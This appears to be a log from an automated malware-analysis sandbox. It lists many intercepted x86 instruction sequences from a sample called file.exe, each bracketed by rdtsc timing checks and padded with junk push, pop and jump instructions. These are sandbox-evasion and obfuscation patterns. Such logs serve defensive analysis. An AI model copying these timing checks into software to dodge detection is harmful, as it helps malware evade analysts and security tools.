Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6301E6 second address: 630207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F45A8838C86h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630207 second address: 63020C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63020C second address: 63025D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F45A8838C78h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 jmp 00007F45A8838C85h 0x00000029 push 00000004h 0x0000002b jno 00007F45A8838C7Ch 0x00000031 push eax 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63025D second address: 630281 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F3308h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F45A84F32F6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6309A0 second address: 6309CB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F45A8838C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ecx 0x00000010 pushad 0x00000011 jmp 00007F45A8838C88h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6309CB second address: 630A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 jp 00007F45A84F330Ch 0x0000000e jmp 00007F45A84F3306h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jo 00007F45A84F3305h 0x0000001f jmp 00007F45A84F32FFh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630AB0 second address: 630ABA instructions: 0x00000000 rdtsc 0x00000002 je 00007F45A8838C7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630ABA second address: 630AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F45A84F3304h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F45A84F3302h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630AEA second address: 630B05 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dl, 06h 0x0000000a lea eax, dword ptr [ebp+12484420h] 0x00000010 mov dword ptr [ebp+122D1A47h], edi 0x00000016 push eax 0x00000017 push eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E531 second address: 66E539 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E539 second address: 66E53F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E53F second address: 66E556 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F3303h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E556 second address: 66E588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F45A8838C7Dh 0x0000000f pushad 0x00000010 jmp 00007F45A8838C81h 0x00000015 jng 00007F45A8838C76h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E9A9 second address: 66E9AF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66ED18 second address: 66ED2E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F45A8838C78h 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66ED2E second address: 66ED33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66ED33 second address: 66ED47 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F45A8838C7Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6194EF second address: 6194F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66EFF6 second address: 66EFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66EFFF second address: 66F003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 673CC9 second address: 673CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F45A8838C76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 673CD3 second address: 673CEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F32FEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 673CEB second address: 673CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 673CF1 second address: 673CFB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F45A84F32F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 673E4B second address: 673E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 673FC2 second address: 673FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 673FC6 second address: 673FE6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F45A8838C87h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 673FE6 second address: 673FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push edi 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 674483 second address: 674489 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 678370 second address: 678376 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 678376 second address: 678380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F45A8838C76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 678380 second address: 678384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6784B0 second address: 6784B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67867F second address: 678683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 678683 second address: 678687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 678687 second address: 678697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F45A84F32F6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67AF3E second address: 67AF46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67ABB0 second address: 67ABB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67ABB7 second address: 67ABD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45A8838C87h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67ABD4 second address: 67ABD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67ABD8 second address: 67ABEF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F45A8838C7Ah 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67ABEF second address: 67AC03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F3300h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 681241 second address: 681245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 681502 second address: 681512 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F45A84F32F6h 0x0000000a jnc 00007F45A84F32F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 681512 second address: 681528 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnl 00007F45A8838C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F45A8838C76h 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6825B3 second address: 6825F2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F45A84F3305h 0x0000000d jmp 00007F45A84F3303h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F45A84F32FBh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 685391 second address: 685395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 685395 second address: 6853A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F45A84F32F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6853A5 second address: 6853D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d js 00007F45A8838C76h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F45A8838C80h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6853D6 second address: 685400 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F45A84F32F6h 0x00000008 jmp 00007F45A84F3306h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 jp 00007F45A84F32F6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 685558 second address: 6855A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jg 00007F45A8838C76h 0x0000000c popad 0x0000000d push esi 0x0000000e jmp 00007F45A8838C84h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop esi 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007F45A8838C84h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F45A8838C82h 0x00000024 push edi 0x00000025 pop edi 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 685857 second address: 68585F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68585F second address: 685884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F45A8838C87h 0x0000000a pushad 0x0000000b jl 00007F45A8838C7Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68920B second address: 689224 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F32FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jnp 00007F45A84F3302h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 689361 second address: 689366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 689366 second address: 689372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnl 00007F45A84F32F6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 689919 second address: 68991E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68991E second address: 689931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007F45A84F32F6h 0x00000009 jne 00007F45A84F32F6h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 689A94 second address: 689A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 689A9A second address: 689A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 689A9F second address: 689AA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68FB6B second address: 68FB71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68FB71 second address: 68FB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68FB77 second address: 68FBB3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F45A84F32F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push esi 0x0000000e jmp 00007F45A84F3304h 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F45A84F3303h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68FBB3 second address: 68FBB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68FD2C second address: 68FD31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68FFC3 second address: 68FFEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45A8838C7Dh 0x00000009 popad 0x0000000a jmp 00007F45A8838C85h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 690E2D second address: 690E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 690E31 second address: 690E35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 690E35 second address: 690E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 690E41 second address: 690E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 691144 second address: 69114E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F45A84F32F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69114E second address: 691169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F45A8838C81h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69175E second address: 69176E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 ja 00007F45A84F32FEh 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 695A2D second address: 695A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45A8838C81h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 695A42 second address: 695A48 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 695A48 second address: 695A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 695A4E second address: 695A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45A84F32FBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 695A5D second address: 695A90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C7Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F45A8838C86h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007F45A8838C76h 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 695A90 second address: 695AA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F45A84F32F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 695AA0 second address: 695AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 695AA4 second address: 695AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F2019 second address: 5F2047 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F45A8838C8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F45A8838C7Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A348F second address: 6A34BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45A84F3305h 0x00000009 jc 00007F45A84F32F6h 0x0000000f popad 0x00000010 popad 0x00000011 jng 00007F45A84F3304h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A34BA second address: 6A34BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A375B second address: 6A3770 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F45A84F32FAh 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A38C4 second address: 6A38C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A38C8 second address: 6A38CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A4155 second address: 6A4161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F45A8838C76h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A48D8 second address: 6A48DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A4FFB second address: 6A4FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A4FFF second address: 6A5009 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F45A84F32F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A5009 second address: 6A501D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F45A8838C76h 0x0000000e jno 00007F45A8838C76h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A501D second address: 6A5023 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A5023 second address: 6A5029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A5029 second address: 6A5036 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push edx 0x00000008 pop edx 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A2E7A second address: 6A2E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F45A8838C76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A2E84 second address: 6A2E88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
